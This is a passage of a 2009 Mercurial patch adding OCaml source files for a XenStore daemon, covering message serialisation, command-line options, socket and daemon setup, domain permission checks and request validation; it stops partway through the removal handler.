+  | XS_WATCH_EVENT
+  | XS_ERROR
+  | XS_IS_DOMAIN_INTRODUCED
+  | XS_RESUME
+  | XS_SET_TARGET
+  | XS_UNKNOWN
+
+(* Convert a message type to an int32 *)
+let xs_message_type_to_int32 message_type =
+  match message_type with
+  | XS_DEBUG -> 0l
+  | XS_DIRECTORY -> 1l
+  | XS_READ -> 2l
+  | XS_GET_PERMS -> 3l
+  | XS_WATCH -> 4l
+  | XS_UNWATCH -> 5l
+  | XS_TRANSACTION_START -> 6l
+  | XS_TRANSACTION_END -> 7l
+  | XS_INTRODUCE -> 8l
+  | XS_RELEASE -> 9l
+  | XS_GET_DOMAIN_PATH -> 10l
+  | XS_WRITE -> 11l
+  | XS_MKDIR -> 12l
+  | XS_RM -> 13l
+  | XS_SET_PERMS -> 14l
+  | XS_WATCH_EVENT -> 15l
+  | XS_ERROR -> 16l
+  | XS_IS_DOMAIN_INTRODUCED -> 17l
+  | XS_RESUME -> 18l
+  | XS_SET_TARGET -> 19l
+  | XS_UNKNOWN -> - 1l
+
+(* Convert an int32 to a message type *)
+let int32_to_message_type xs_message_type =
+  match xs_message_type with
+  | 0l -> XS_DEBUG
+  | 1l -> XS_DIRECTORY
+  | 2l -> XS_READ
+  | 3l -> XS_GET_PERMS
+  | 4l -> XS_WATCH
+  | 5l -> XS_UNWATCH
+  | 6l -> XS_TRANSACTION_START
+  | 7l -> XS_TRANSACTION_END
+  | 8l -> XS_INTRODUCE
+  | 9l -> XS_RELEASE
+  | 10l -> XS_GET_DOMAIN_PATH
+  | 11l -> XS_WRITE
+  | 12l -> XS_MKDIR
+  | 13l -> XS_RM
+  | 14l -> XS_SET_PERMS
+  | 15l -> XS_WATCH_EVENT
+  | 16l -> XS_ERROR
+  | 17l -> XS_IS_DOMAIN_INTRODUCED
+  | 18l -> XS_RESUME
+  | 19l -> XS_SET_TARGET
+  | _ -> XS_UNKNOWN
+
+(* Return string representation of a message type *)
+let message_type_to_string message_type =
+  match message_type with
+  | XS_DEBUG -> "DEBUG"
+  | XS_DIRECTORY -> "DIRECTORY"
+  | XS_READ -> "READ"
+  | XS_GET_PERMS -> "GET_PERMS"
+  | XS_WATCH -> "WATCH"
+  | XS_UNWATCH -> "UNWATCH"
+  | XS_TRANSACTION_START -> "TRANSACTION_START"
+  | XS_TRANSACTION_END -> "TRANSACTION_END"
+  | XS_INTRODUCE -> "INTRODUCE"
+  | XS_RELEASE -> "RELEASE"
+  | XS_GET_DOMAIN_PATH -> "GET_DOMAIN_PATH"
+  | XS_WRITE -> "WRITE"
+  | XS_MKDIR -> "MKDIR"
+  | XS_RM -> "RM"
+  | XS_SET_PERMS -> "SET_PERMS"
+  | XS_WATCH_EVENT -> "WATCH_EVENT"
+  | XS_ERROR -> "ERROR"
+  | XS_IS_DOMAIN_INTRODUCED -> "IS_DOMAIN_INTRODUCED"
+  | XS_RESUME -> "RESUME"
+  | XS_SET_TARGET -> "SET_TARGET"
+  | XS_UNKNOWN -> "UNKNOWN"
+
+(* Message header *)
+type header =
+  {
+    message_type : xs_message_type;
+    transaction_id : int32;
+    request_id : int32;
+    length : int
+  }
+
+(* Message *)
+type message =
+  {
+    header : header;
+    payload : string
+  }
+
+(* Make a message *)
+let make message_type transaction_id request_id payload =
+  {
+    header =
+      {
+        message_type = message_type;
+        transaction_id = transaction_id;
+        request_id = request_id;
+        length = (String.length payload)
+      };
+    payload = payload
+  }
+
+(* Null message *)
+let null_message = make XS_UNKNOWN 0l 0l Constants.null_string
+
+(* ACK message *)
+let ack message =
+  make message.header.message_type message.header.transaction_id 
message.header.request_id (Utils.null_terminate "OK")
+
+(* Error message *)
+let error message error =
+  make XS_ERROR message.header.transaction_id message.header.request_id 
(Utils.null_terminate (Constants.error_message error))
+
+(* Event message *)
+let event payload =
+  make XS_WATCH_EVENT 0l 0l payload
+
+(* Reply message *)
+let reply message payload =
+  make message.header.message_type message.header.transaction_id 
message.header.request_id payload
+
+(* Deserialise a message header from a string *)(* Null message *)
+let deserialise_header buffer =
+  {
+    message_type = int32_to_message_type (Utils.bytes_to_int32 (String.sub 
buffer 0 4));
+    transaction_id = Utils.bytes_to_int32 (String.sub buffer 8 4);
+    request_id = Utils.bytes_to_int32 (String.sub buffer 4 4);
+    length = Utils.bytes_to_int (String.sub buffer 12 4)
+  }
+
+(* Serialise a message header to a string *)
+let serialise_header header =
+  let message_type = Utils.int32_to_bytes (xs_message_type_to_int32 
header.message_type)
+  and transaction_id = Utils.int32_to_bytes header.transaction_id
+  and request_id = Utils.int32_to_bytes header.request_id
+  and length = Utils.int_to_bytes header.length in
+  message_type ^ request_id ^ transaction_id ^ length
diff -r 10a8fae412c5 tools/xenstore/option.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/option.ml  Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,95 @@
+(* 
+    Options for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+(* Options type *)
+type t = {
+  fork : bool;
+  output_pid : bool;
+  domain_init : bool;
+  separate_domain : bool;
+  pid_file : string;
+  trace_file : string;
+  recovery : bool;
+  verbose : bool;
+  quota_num_entries_per_domain : int;
+  quota_max_entry_size : int;
+  quota_num_watches_per_domain : int;
+  quota_max_transaction : int
+}
+
+(* Usage message header *)
+let usage = "Usage:\n  xenstored <options>\n\nwhere options may include:\n"
+
+(* Parse command-line options *)
+let parse () =
+  (* Default options *)
+  let fork = ref true
+  and output_pid = ref false
+  and domain_init = ref true
+  and pid_file = ref ""
+  and trace_file = ref ""
+  and recovery = ref true
+  and verbose = ref false
+  and separate_domain = ref false
+  and quota_num_entries_per_domain = ref 1000
+  and quota_max_entry_size = ref 2048
+  and quota_num_watches_per_domain = ref 128
+  and quota_max_transaction = ref 10 in
+  
+  (* Command-line arguments list *)
+  let spec_list = Arg.align [
+      ("--no-domain-init", Arg.Clear domain_init, " to state that xenstored 
should not initialise dom0,");
+      ("--pid-file", Arg.Set_string pid_file, "<file> giving a file for the 
daemon's pid to be written,");
+      ("--no-fork", Arg.Clear fork, " to request that the daemon does not 
fork,");
+      ("--output-pid", Arg.Set output_pid, " to request that the pid of the 
daemon is output,");
+      ("--trace-file", Arg.String (fun s -> trace_file := s; Trace.traceout := 
Some (open_out s)), "<file> giving the file for logging,");
+      ("--entry-nb", Arg.Set_int quota_num_entries_per_domain, "<nb> limit the 
number of entries per domain,");
+      ("--entry-size", Arg.Set_int quota_max_entry_size, "<size> limit the 
size of entry per domain,");
+      ("--entry-watch", Arg.Set_int quota_num_watches_per_domain,"<nb> limit 
the number of watches per domain,");
+      ("--transaction", Arg.Set_int quota_max_transaction, "<nb> limit the 
number of transaction allowed per domain,");
+      ("--no-recovery", Arg.Clear recovery, " to request that no recovery 
should be attempted when the store is corrupted (debug only),");
+      ("--preserve-local", Arg.Unit (fun () -> ()), " to request that /local 
is preserved on start-up,");
+      ("--verbose", Arg.Set verbose, " to request verbose execution.");
+      ("--separate-dom", Arg.Set separate_domain, " xenstored runs in it's own 
domain.");
+      ] in
+  
+  (* Parse command-line arguments *)
+  Arg.parse spec_list Os.parse_option usage;
+  
+  (* Set and return chosen options *)
+  {
+    fork = !fork;
+    output_pid = !output_pid;
+    domain_init = !domain_init;
+    separate_domain = !separate_domain;
+    pid_file = !pid_file;
+    trace_file = !trace_file;
+    recovery = !recovery;
+    verbose = !verbose;
+    quota_num_entries_per_domain = !quota_num_entries_per_domain;
+    quota_max_entry_size = !quota_max_entry_size;
+    quota_num_watches_per_domain = !quota_num_watches_per_domain;
+    quota_max_transaction = !quota_max_transaction
+  }
+
+let check_options options =
+  if not options.domain_init && options.separate_domain then Utils.barf_perror 
"Incompatible options";
+  if options.fork then Os.daemonise ();
+  if options.pid_file <> Constants.null_string then Os.write_pid_file 
options.pid_file;
+  if options.output_pid then (Printf.printf "%d\n" (Os.get_pid ()); flush 
stdout)
diff -r 10a8fae412c5 tools/xenstore/os.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/os.ml      Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,224 @@
+(* 
+    OS-specific code for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+let xenstored_proc_domid = "/proc/xen/xsd_domid"
+let xenstored_proc_dom0_port = "/proc/xen/xsd_dom0_port"
+let xenstored_proc_dom0_mfn = "/proc/xen/xsd_dom0_mfn"
+let xenstored_proc_kva = "/proc/xen/xsd_kva"
+let xenstored_proc_port = "/proc/xen/xsd_port"
+
+(* Change the permissions for a socket address *)
+let xsd_chmod addr =
+  match addr with
+  | Unix.ADDR_UNIX name -> Unix.chmod name 0o600
+  | _ -> Utils.barf_perror "addr -- chmod oops"
+
+(* Get a XenStore daemon directory *)
+let xsd_getdir env_var fallback =
+  try Sys.getenv env_var with Not_found -> fallback
+
+(* Create the given XenStore daemon directory, if needed *)
+let xsd_mkdir name =
+  if not (Sys.file_exists name) then Unix.mkdir name 0o755
+
+(* Return the XenStore daemon run directory *)
+let xsd_rundir () =
+  xsd_getdir "XENSTORED_RUNDIR" "/var/run/xenstored"
+
+(* Return the XenStore daemon path *)
+let xsd_socket_path () =
+  xsd_getdir "XENSTORED_PATH" ((xsd_rundir ()) ^ "/socket")
+
+(* Return the name of the XenStore daemon read-only socket *)
+let xsd_socket_ro () =
+  (xsd_socket_path ()) ^ "_ro"
+
+(* Return the name of the XenStore daemon read-write socket *)
+let xsd_socket_rw () =
+  xsd_socket_path ()
+
+(* Remove the old sockets *)
+let xsd_unlink addr =
+  match addr with
+  | Unix.ADDR_UNIX name -> if Sys.file_exists name then Unix.unlink name
+  | _ -> Utils.barf_perror "addr -- unlink oops"
+
+let conn_fds = Hashtbl.create 8
+let conn_id = ref (- 1)
+let in_set = ref []
+let out_set = ref []
+
+(* Accept a connection *)
+let accept socket can_write in_set out_set =
+  let (fd, _) = Unix.accept socket in
+  let interface = new Socket.socket_interface fd can_write in_set out_set in
+  let connection = new Connection.connection interface in
+  let domu = new Domain.domain !conn_id connection in
+  decr conn_id;
+  Hashtbl.add conn_fds domu#id fd;
+  domu
+
+(* Create and listen to a socket *)
+let create_socket socket_name =
+  xsd_mkdir (xsd_rundir ());
+  let addr = Unix.ADDR_UNIX socket_name
+  and socket = Unix.socket Unix.PF_UNIX Unix.SOCK_STREAM 0 in
+  xsd_unlink addr;
+  Unix.bind socket addr;
+  xsd_chmod addr;
+  Unix.listen socket 1;
+  socket
+
+let filter_conn_fds conn_fds domains =
+  let active_conn_ids = List.fold_left (fun ids domain -> if domain#id < 0 
then domain#id :: ids else ids) [] domains in
+  Hashtbl.iter (fun id fd -> if not (List.mem id active_conn_ids) then 
Hashtbl.remove conn_fds id) conn_fds
+
+(* Fork daemon *)
+let fork_daemon () =
+  let pid = Unix.fork () in
+  if pid < 0 then Utils.barf_perror ("Failed to fork daemon: " ^ 
(string_of_int pid));
+  if pid <> 0 then exit 0
+
+(* Return the (input) socket connections *)
+let get_input_socket_connections conn_fds =
+  Hashtbl.fold (fun _ fd rest -> fd :: rest) conn_fds []
+
+(* Return the (output) socket connections *)
+let get_output_socket_connections domains conn_fds =
+  List.fold_left (fun rest domain -> if domain#can_write then Hashtbl.find 
conn_fds domain#id :: rest else rest) [] (List.filter (fun domain -> 
Hashtbl.mem conn_fds domain#id) domains)
+
+(* Read a value from a proc file *)
+let read_int_from_proc name =
+  let fd = Unix.openfile name [ Unix.O_RDONLY ] 0o600
+  and buff = String.create 20 in
+  let int = Unix.read fd buff 0 (String.length buff) in
+  Unix.close fd;
+  if int <> Constants.null_file_descr then int_of_string (String.sub buff 0 
int) else Constants.null_file_descr
+
+let socket_rw = create_socket (xsd_socket_rw ())
+let socket_ro = create_socket (xsd_socket_ro ())
+let special_fds = ref [ socket_rw; socket_ro ]
+
+(* Check connections *)
+let check_connections xenstored event_chan =
+  filter_conn_fds conn_fds xenstored#domains#domains;
+  
+  let input_conns = get_input_socket_connections conn_fds
+  and output_conns = get_output_socket_connections xenstored#domains#domains 
conn_fds
+  and timeout = xenstored#domains#timeout in
+  
+  let (i_set, o_set, _) = Unix.select ((if event_chan <> 
Constants.null_file_descr then Socket.file_descr_of_int event_chan :: 
!special_fds else !special_fds) @ input_conns) output_conns [] timeout in
+  in_set := i_set;
+  out_set := o_set;
+  
+  if List.mem socket_rw !in_set then xenstored#add_domain (accept socket_rw 
true in_set out_set);
+  if List.mem socket_ro !in_set then xenstored#add_domain (accept socket_ro 
false in_set out_set)
+
+(* Check the event channel for an event *)
+let check_event_chan event_chan =
+  List.mem (Socket.file_descr_of_int event_chan) !in_set
+
+(* Daemonise *)
+let daemonise () =
+  (* Separate from parent via fork, so init inherits us *)
+  fork_daemon ();
+  
+  (* Session leader so ^C doesn't whack us *)
+  ignore (Unix.setsid ());
+  
+  (* Let session leader exit so child cannot regain CTTY *)
+  fork_daemon ();
+  
+  (* Move off any mount points we might be in *)
+  (try Unix.chdir "/" with _ -> Utils.barf_perror "Failed to chdir");
+  
+  (* Discard parent's old-fashioned umask prejudices *)
+  ignore (Unix.umask 0);
+  
+  (* Redirect outputs to null device *)
+  let dev_null = Unix.openfile "/dev/null" [ Unix.O_RDWR ] 0o600 in
+  Unix.dup2 dev_null Unix.stdin;
+  Unix.dup2 dev_null Unix.stdout;
+  Unix.dup2 dev_null Unix.stderr;
+  Unix.close dev_null
+
+(* Return the XenStore domain ID *)
+let get_domxs_id () =
+  read_int_from_proc xenstored_proc_domid
+
+(* Return the Domain-0 mfn *)
+let get_dom0_mfn () =
+  read_int_from_proc xenstored_proc_dom0_mfn
+
+(* Return the Domain-0 port *)
+let get_dom0_port () =
+  read_int_from_proc xenstored_proc_dom0_port
+
+(* Return the pid *)
+let get_pid () =
+  Unix.getpid ()
+
+(* Return the current time *)
+let get_time () =
+  let tm = Unix.localtime (Unix.gettimeofday ()) in
+  let year = tm.Unix.tm_year + 1900
+  and month = tm.Unix.tm_mon + 1
+  and day = tm.Unix.tm_mday
+  and hour = tm.Unix.tm_hour
+  and minute = tm.Unix.tm_min
+  and second = tm.Unix.tm_sec in
+  Printf.sprintf "%04d%02d%02d %02d:%02d:%02d" year month day hour minute 
second;;
+
+(* Return the XenBus port *)
+let get_xenbus_port () =
+  let fd = Unix.openfile xenstored_proc_port [ Unix.O_RDONLY ] 0
+  and str = String.create 20 in
+  let len = Unix.read fd str 0 (String.length str) in
+  Unix.close fd;
+  if len <> - 1 then int_of_string (String.sub str 0 len) else 
Constants.null_file_descr
+
+(* OS specific initialisation *)
+let init () =
+  ignore (Sys.signal Sys.sigpipe Sys.Signal_ignore)
+
+(* Map XenBus page *)
+let map_xenbus port =
+  let fd = Unix.openfile xenstored_proc_kva [ Unix.O_RDWR ] 0o600 in
+  let interface = new Xenbus.xenbus_interface port (Xenbus.mmap 
(Socket.int_of_file_descr fd)) in
+  Unix.close fd;
+  interface
+
+(* Extra option parsing, if needed *)
+let parse_option option =
+  ()
+
+(* Write PID file *)
+let write_pid_file pid_file =
+  let fd = Unix.openfile pid_file [ Unix.O_RDWR; Unix.O_CREAT ] 0o600 in
+  
+  (* Exit silently if daemon already running *)
+  (try Unix.lockf fd Unix.F_TLOCK 0 with _ -> ignore (exit 0));
+  
+  let pid = string_of_int (Unix.getpid ()) in
+  let len = String.length pid in
+  
+  try
+    if Unix.write fd pid 0 len <> len then Utils.barf_perror ("Writing pid 
file " ^ pid_file);
+    Unix.close fd
+  with _ -> Utils.barf_perror ("Writing pid file " ^ pid_file)
diff -r 10a8fae412c5 tools/xenstore/permission.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/permission.ml      Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,111 @@
+(* 
+    Permissions for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+type access =
+  | NONE
+  | READ
+  | WRITE
+  | BOTH
+
+type t =
+  {
+    access : access;
+    domain_id : int
+  }
+
+let make access domain_id =
+  {
+    access = access;
+    domain_id = domain_id
+  }
+
+let permission_of_string string =
+  {
+    access =
+      (match string.[0] with
+        | 'n' -> NONE
+        | 'r' -> READ
+        | 'w' -> WRITE
+        | 'b' -> BOTH
+        | _ -> raise (Constants.Xs_error (Constants.EINVAL, 
"permission_of_string", string)));
+    domain_id = int_of_string (String.sub string 1 (pred (String.length 
string)))
+  }
+
+let string_of_permission permission =
+  let perm_str =
+    match permission.access with
+    | NONE -> "n"
+    | READ -> "r"
+    | WRITE -> "w"
+    | BOTH -> "b" in
+  perm_str ^ (string_of_int permission.domain_id)
+
+let check_access access1 access2 =
+  match access1 with
+  | READ | WRITE -> access2 = access1 || access2 = BOTH
+  | _ -> access2 = access1
+
+let compare permission1 permission2 =
+  permission1.access = permission2.access && permission1.domain_id = 
permission2.domain_id
+
+let get_path path =
+  Store.root_path ^ ".permissions" ^ (if path = Store.root_path then 
Constants.null_string else path)
+
+class permissions =
+object(self)
+  method add (store : string Store.store) (path : string) (domain_id : int) =
+    let domain_id = if domain_id < 0 then 0 else domain_id
+    and parent_path = Store.parent_path path in
+    if not (store#node_exists (get_path parent_path)) then self#add store 
parent_path domain_id;
+    let parent_permissions = self#get store parent_path in
+    let new_permissions = if domain_id = 0 then parent_permissions else make 
(List.hd parent_permissions).access domain_id :: List.tl parent_permissions in
+    self#set (List.map string_of_permission new_permissions) store path
+  method check (store : string Store.store) path access domain_id =
+    let domain_id = if domain_id < 0 then 0 else domain_id
+    and permissions = self#get store path in
+    if domain_id = 0
+    then true
+    else
+      let default_permission = List.hd permissions
+      and actual_permissions = List.tl permissions in
+      if default_permission.domain_id = domain_id
+      then true
+      else check_access access (try (List.find (fun perm -> perm.domain_id = 
domain_id) actual_permissions).access with Not_found -> 
default_permission.access)
+  method get (store : string Store.store) (path : string) =
+    let ppath = get_path path in
+    match store#read_node ppath with
+    | Store.Value permissions | Store.Hack (permissions, _) -> List.map 
permission_of_string (Utils.split permissions)
+    | Store.Empty -> raise (Constants.Xs_error (Constants.EINVAL, 
"Permission.permissions#get", ppath))
+    | Store.Children _ ->
+        let parent_path = Store.parent_path path in
+        let parent_permissions = self#get store parent_path in
+        self#set (List.map string_of_permission parent_permissions) store path;
+        parent_permissions
+  method remove (store : string Store.store) path = store#remove_node 
(get_path path)
+  method set (permissions : string list) (store : string Store.store) (path : 
string) =
+    let ppath = get_path path in
+    let parent_path = Store.parent_path path in
+    if not (path = Store.root_path) && not (store#node_exists (get_path 
parent_path))
+    then (
+      let domain_id = (permission_of_string (List.hd permissions)).domain_id in
+      self#add store parent_path domain_id
+    );
+    ignore (try store#read_node ppath with _ -> store#create_node ppath; 
store#read_node ppath);
+    store#write_node ppath (Utils.combine_with_string permissions (String.make 
1 Constants.null_char));
+end
diff -r 10a8fae412c5 tools/xenstore/process.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/process.ml Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,412 @@
+(* 
+    Processing for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+(* Check for a valid domain ID *)
+let check_domain_id domain_id =
+  try int_of_string domain_id >= 0 with _ -> false
+
+(* Check for a valid domain ID (only parameter) *)
+let check_domain_id_only payload =
+  let domain_id = List.hd (Utils.split payload) in
+  String.length domain_id = pred (String.length payload) && check_domain_id 
domain_id
+
+(* Check for 32-bit integer *)
+let check_int int =
+  try ignore (Int32.of_string int); true with _ -> false
+
+(* Check introduce *)
+let check_introduce payload =
+  let split = Utils.split payload in
+  let length = List.length split in
+  (length = 3 || length = 4) && check_domain_id (List.nth split 0) && 
check_int (List.nth split 1) && check_int (List.nth split 2)
+
+let rec check_chars path i =
+  if i >= String.length path
+  then true
+  else if not (String.contains Store.valid_characters path.[i])
+  then false
+  else check_chars path (succ i)
+
+(* Check for a valid path *)
+let check_path path =
+  if String.length path > 0
+  then
+    if path.[pred (String.length path)] <> Store.dividor
+    then
+      if not (Utils.strstr path "//")
+      then
+        if Store.is_relative path
+        then
+          if String.length path <= Constants.relative_path_max
+          then check_chars path 0
+          else false
+        else if String.sub path 0 (String.length Store.root_path) = 
Store.root_path
+        then
+          if String.length path <= Constants.absolute_path_max
+          then check_chars path 0
+          else false
+        else false
+      else false
+    else if path = Store.root_path then true else false
+  else false
+
+(* Check for a valid path (only parameter) *)
+let check_path_only payload =
+  let path = Utils.strip_null payload in
+  succ (String.length path) = String.length payload && check_path path
+
+let check_permissions payload =
+  let split = Utils.split payload in
+  let min_length = if payload.[pred (String.length payload)] = 
Constants.null_char then 2 else 3
+  and perm_list = if payload.[pred (String.length payload)] = 
Constants.null_char then List.tl split else Utils.remove_last (List.tl split) in
+  List.length split >= min_length && check_path (List.nth split 0) && 
List.fold_left (fun accum perm -> accum && (try ignore 
(Permission.permission_of_string perm); true with _ -> false)) true perm_list
+
+(* Check for a valid transaction end *)
+let check_transaction_end payload =
+  let value = Utils.strip_null payload in
+  succ (String.length value) = String.length payload && (value = 
Constants.payload_true || value = Constants.payload_false)
+
+(* Check for a valid transaction start *)
+let check_transaction_start payload =
+  String.length payload = 1 && payload.[0] = Constants.null_char
+
+(* Check for a valid watch path *)
+let check_watch_path path =
+  if Store.is_event path then check_chars path 0 else check_path path
+
+(* TODO: Check for a valid watch token *)
+let check_watch_token token =
+  true
+
+(* Check for a valid watch/unwatch *)
+let check_watch payload =
+  let split = Utils.split payload in
+  let length = List.length split in
+  (length = 2 || length = 3) && check_watch_path (List.nth split 0) && 
check_watch_token (List.nth split 1)
+
+let check_write payload =
+  let split = Utils.split payload in
+  let length = List.length split in
+  (length = 1 || length = 2) && check_path (List.nth split 0)
+
+(* Check a message to make sure the payload is valid *)
+let check message =
+  match message.Message.header.Message.message_type with
+  | Message.XS_DIRECTORY -> check_path_only message.Message.payload
+  | Message.XS_GET_DOMAIN_PATH -> check_path_only message.Message.payload
+  | Message.XS_GET_PERMS -> check_path_only message.Message.payload
+  | Message.XS_INTRODUCE -> check_introduce message.Message.payload
+  | Message.XS_IS_DOMAIN_INTRODUCED -> check_path_only message.Message.payload
+  | Message.XS_MKDIR -> check_path_only message.Message.payload
+  | Message.XS_READ -> check_path_only message.Message.payload
+  | Message.XS_RELEASE -> check_path_only message.Message.payload
+  | Message.XS_RESUME -> check_path_only message.Message.payload
+  | Message.XS_RM -> check_path_only message.Message.payload
+  | Message.XS_SET_PERMS -> check_permissions message.Message.payload
+  | Message.XS_TRANSACTION_END -> check_transaction_end message.Message.payload
+  | Message.XS_TRANSACTION_START -> check_transaction_start 
message.Message.payload
+  | Message.XS_UNWATCH -> check_watch message.Message.payload
+  | Message.XS_WATCH -> check_watch message.Message.payload
+  | Message.XS_WRITE -> check_write message.Message.payload
+  | _ -> false
+
+(* Return the list of parent paths that will be created for a given path *)
+let rec created_paths store path =
+  if store#node_exists path then [] else path :: created_paths store 
(Store.parent_path path)
+
+(* Return the list of child paths that will be deleted for a given path *)
+let rec removed_paths store path =
+  match store#read_node path with
+  | Store.Children children | Store.Hack (_, children) -> List.fold_left (fun 
paths child -> paths @ (removed_paths store child#path)) [] children
+  | _ -> [ path ]
+
+(* Process a directory message *)
+let process_directory domain store xenstored message =
+  let path = Store.canonicalise domain (Utils.strip_null 
message.Message.payload) in
+  try
+    if xenstored#permissions#check store path Permission.READ domain#id
+    then
+      let payload =
+        match store#read_node path with
+        | Store.Children (children) | Store.Hack (_, children) -> 
List.fold_left (fun children_string child -> if check_path child#path then 
children_string ^ (Utils.null_terminate (Store.base_path child#path)) else 
children_string) Constants.null_string children
+        | _ -> Constants.null_string in
+      domain#add_output_message (Message.reply message payload)
+    else domain#add_output_message (Message.error message Constants.EACCES)
+  with Constants.Xs_error (errno, _, _) -> domain#add_output_message 
(Message.error message errno)
+
+(* Process a get domain path message *)
+let process_get_domain_path domain store message =
+  let domid = Utils.strip_null message.Message.payload in
+  let path = Utils.null_terminate (Store.domain_root ^ domid) in
+  domain#add_output_message (Message.reply message path)
+
+(* Process a get permissions message *)
+let process_get_perms domain store xenstored message =
+  let path = Store.canonicalise domain (Utils.strip_null 
message.Message.payload) in
+  if xenstored#permissions#check store path Permission.READ domain#id
+  then
+    let permissions = xenstored#permissions#get store path in
+    let payload = List.fold_left (fun permissions_string permission -> 
permissions_string ^ (Utils.null_terminate (Permission.string_of_permission 
permission))) Constants.null_string permissions in
+    domain#add_output_message (Message.reply message payload)
+  else domain#add_output_message (Message.error message Constants.EACCES)
+
+(* Process an introduce message *)
+let process_introduce domain store xenstored message =
+  let split = Utils.split message.Message.payload in
+  let domid = List.nth split 0
+  and mfn = List.nth split 1
+  and port = List.nth split 2
+  and reserved = if List.length split = 4 then List.nth split 3 else 
Constants.null_string in
+  if not (Domain.is_unprivileged domain)
+  then (
+    (* XXX: Reserved value *)
+    if String.length reserved > 0 then ();
+    let domu = Domain.domu_init (int_of_string domid) (int_of_string port) 
(int_of_string mfn) false in
+    xenstored#add_domain domu;
+    xenstored#watches#fire_watches "@introduceDomain" 
(message.Message.header.Message.transaction_id <> 0l) false;
+    domain#add_output_message (Message.ack message)
+  )
+  else domain#add_output_message (Message.error message Constants.EACCES)
+
+(* Process a is domains introduced message *)
+let process_is_domain_introduced domain store xenstored message =
+  let domid = int_of_string (Utils.strip_null message.Message.payload) in
+  let domain_exists = try xenstored#domains#find_by_id domid; true with 
Not_found -> false in
+  let payload = Utils.null_terminate (if domid = Constants.domain_id_self || 
domain_exists then Constants.payload_true else Constants.payload_false) in
+  domain#add_output_message (Message.reply message payload)
+
+(* Process a mkdir message *)
+let process_mkdir domain store xenstored message =
+  let path = Store.canonicalise domain (Utils.strip_null 
message.Message.payload)
+  and transaction = Transaction.make domain#id 
message.Message.header.Message.transaction_id in
+  (* If permissions exist, node already exists *)
+  try
+    if xenstored#permissions#check store path Permission.WRITE domain#id
+    then domain#add_output_message (Message.ack message)
+    else domain#add_output_message (Message.error message Constants.EACCES)
+  with _ ->
+      try
+        if not (store#node_exists path)
+        then (
+          let paths = created_paths store path in
+          store#create_node path;
+          xenstored#permissions#add store path domain#id;
+          List.iter (fun path -> xenstored#domain_entry_incr store transaction 
path) paths;
+          if message.Message.header.Message.transaction_id = 0l
+          then (
+            xenstored#transactions#invalidate path;
+            xenstored#watches#fire_watches path false false
+          )
+        );
+        domain#add_output_message (Message.ack message)
+      with e -> raise e (*domain#add_output_message (Message.error message 
Constants.EINVAL)*)
+
+(* Process a read message *)
+let process_read domain store xenstored message =
+  let path = Store.canonicalise domain (Utils.strip_null 
message.Message.payload) in
+  try
+    if xenstored#permissions#check store path Permission.READ domain#id
+    then
+      let payload =
+        match store#read_node path with
+        | Store.Value value | Store.Hack (value, _) -> value
+        | _ -> Constants.null_string in
+      domain#add_output_message (Message.reply message payload)
+    else domain#add_output_message (Message.error message Constants.EACCES)
+  with Constants.Xs_error (errno, _, _) -> domain#add_output_message 
(Message.error message errno)
+
+(* Process a release message *)
+let process_release domain store xenstored message =
+  if domain#id <= 0
+  then
+    let domu_id = int_of_string (Utils.strip_null message.Message.payload) in
+    try
+      xenstored#remove_domain (xenstored#domains#find_by_id domu_id);
+      if domu_id > 0 then xenstored#watches#fire_watches "@releaseDomain" 
false false;
+      domain#add_output_message (Message.ack message)
+    with Not_found -> domain#add_output_message (Message.error message 
Constants.ENOENT)
+  else domain#add_output_message (Message.error message Constants.EACCES)
+
+(* Process a rm message *)
+let process_rm domain store xenstored message =
+  let path = Store.canonicalise domain (Utils.strip_null 
message.Message.payload)
